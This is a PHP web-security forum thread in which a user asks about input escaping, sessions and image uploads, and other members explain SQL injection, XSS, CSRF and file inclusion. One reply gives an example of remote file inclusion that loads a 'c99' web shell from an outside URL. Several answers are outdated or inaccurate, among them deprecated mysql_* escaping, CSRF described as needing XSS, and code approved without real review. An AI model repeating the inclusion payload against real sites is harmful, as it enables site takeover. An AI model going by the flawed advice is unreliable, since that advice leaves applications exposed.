SQL Injection Security PHP

Hi,

I was wondering if the following code is suitable to check user input:

Input_check.php

Code: Select all

 
<?php
function sql_quote( $value ) 
{ 
include 'connectdb_techs.php';
if( get_magic_quotes_gpc() ) 
 { 
     $value = stripslashes( $value ); 
 } 
 
if( function_exists( "mysql_real_escape_string" ) ) 
 { 
      $value = mysql_real_escape_string( $value ); 
 } 
 else 
 { 
     $value = addslashes( $value ); 
 }
 
return $value; 
include 'closedb.php';
}
?>

is called from:

Code: Select all

 
<?php
session_start();
header("Cache-control: private");
include 'input_check.php';
$user_name = $_POST['user_name'];
$password = $_POST['password'];
$_SESSION['user_name'] = sql_quote($user_name);
$_SESSION['password'] =  sql_quote($password);
$a = $_POST['a'];
if ($a == 'Login')
 {
 header( 'Location: http://***/login2.php' ) ;
 }
 
if ($a == 'Register')
 {
 header( 'Location: http://***/register_page_2.php' ) ;
 }
?>

Thanks,

Nathan.

Yes, that should work.

Cool, that takes care of malicious input.. I've read there's also issues of a users session being hijacked and you should re-issue a session ID after login.. is this the case?? Any other security issues I should be aware off??

Thanks,

Nathan.

Session hijacking is when someone finds out the session of another user. The sessionid is normally stored in a cookie, so if someone steals this cookie and sets it as their own, the website will think the person is the user that the cookie was stolen from.
Cookies are normally stolen via XSS vulnerabilities in your site, so make sure all user input is filtered to remove HTML characters.
Another thing you can do to protect against XSS is bind sessions to IP addresses. If you do this, if someone steals a cookie and uses it, their IP will not match the one associated with the cookie, and so they should not be granted access.
Another related security problem is CSRF, although this is not as common. This is when an XSS hole is exploited to cause the user to perform an action that the user didn't choose to do.

More serious security holes include LFI and RFI.
Local File Inclusion is when an include() is exploited, but can only be used to access local files. But, if users are allowed to upload files (e.g. an avatar), this can be a very serious problem, as they could potentially execute code.
Remote File Inclusion is probably the worse coding vulnerability you could get. It is when a user is able to include whatever page they like on your website.
e.g. include($page);
If page hasn't been defined beforehand, someone could set $page as, e.g. http://www.site.com/c99.txt
This would include the code at c99.txt into your php code.
By doing this, someone can have full access to the files on your site.

If you want me to explain any of them more, just ask.

crikey, ok... do need to think about that. I give users the ability to upload images, but i check the extensions first.. and only display in an img tag.. is that safe??

also I use this code to start a page:

Code: Select all

session_start();
header("Cache-control: private");

does this send a cookie to the users machine, or is it all server side??


Other simpler stuff to sort out!!

I'm retrieving data from mySQL to a textbox for editing. I can't get it to work when using the mysql_real_escape_string function.. it keeps either printing slashes or displaying text without line breaks. Is this an important function for security??

Thanks,

Nathan.

If you check extensions it should be fine, although there are always problems with image CSRF. Also, check to make sure uploaded images don't allow any tags, to prevent some persistant XSS.

The problem is not how they are displayed, but how they are uploaded to the server. E.g. If a user is allowed to upload "badfile.php", it will appear on the page as a broken image, but then if a user directly visits that broken file, they will be visiting badfile.php and the server treats it as a typical php file.

No cookies are sent here.
See here or look up php.net for more information about sending/processing cookies.

session_start() starts the session. (No surprises there )
The header sends some HTTP Headers.
There aren't any problems with this, but if the headers are displayed anywhere, e.g. if you display the user agent, then you must remember to filter the strings, as headers can be spoofed using flash for malicious purposes.

stripslashes() just before putting the data where the text goes. Then use mysql_real_escape_string() when updating or inserting back into the database.

str_replace() \n with <br>.

It does the same as adding slashes to \x00, \n, \r, \, ', " and \x1a; it is important for security.
See here for more information about the function.

Does this help?

Ok the printing from sql now works.. however..

I just wrote a simple html page, saved it to my desktop, renamed it something.jpg, went to my website, created new user, uploaded something.jpg as my user image, viewed source to see where it was stored, opened new browser, typed url/filename.jpg and the code executed... bad right!!
how do I make sure that a file named something.jpg is actually an image file and not script before it's uploaded??

After the image is uploaded, check if it's a valid image file. If it is, keep it, if not, destroy it.
Try this:

PHP: Select all

$image = "nameoftheimage.jpg";
// name of the image file person is trying to upload
   if (!getimagesize($image)){ 
      echo("not a valid image"); 
      unlink($image);
   } 
   else { 
      // save image 
      echo("Uploaded"); 
   } 

This method still isn't very safe though.
If you combine this with extension checking, the ability to execute server side scripts (e.g. PHP) is stopped, so long as .htaccess doesn't allow image formats to be interpreted as PHP or similar.

This is quite a good article (PDF) and Google has quite a lot of answers.